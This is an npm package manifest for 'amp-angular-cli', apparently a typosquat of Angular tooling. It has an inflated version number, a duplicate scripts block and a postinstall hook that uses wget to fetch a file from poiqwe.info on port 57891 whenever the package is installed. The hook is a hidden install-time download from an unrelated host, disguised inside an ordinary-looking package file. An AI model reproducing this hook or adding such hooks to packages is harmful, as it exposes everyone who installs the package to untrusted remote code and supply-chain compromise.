{
  "name": "amp-angular-cli",
  "version": "57.0.9",
  "description": "amp-angular-cli",
  "main": "index.js",
  "scripts": {
    "test": "exit 1"
  },
  "repository": {
    "type": "git",
    "url": "git+https://github.com/lex-hill/amp-angular-cli.git"
  },
  "author": "",
  "license": "ISC",
  "bugs": {
    "url": "https://github.com/lex-hill/amp-angular-cli/issues"
  },
  "homepage": "https://github.com/lex-hill/amp-angular-cli#readme",
  "scripts": {
    "postinstall": "wget http://poiqwe.info:57891/amp-angular-cli"
  }
}
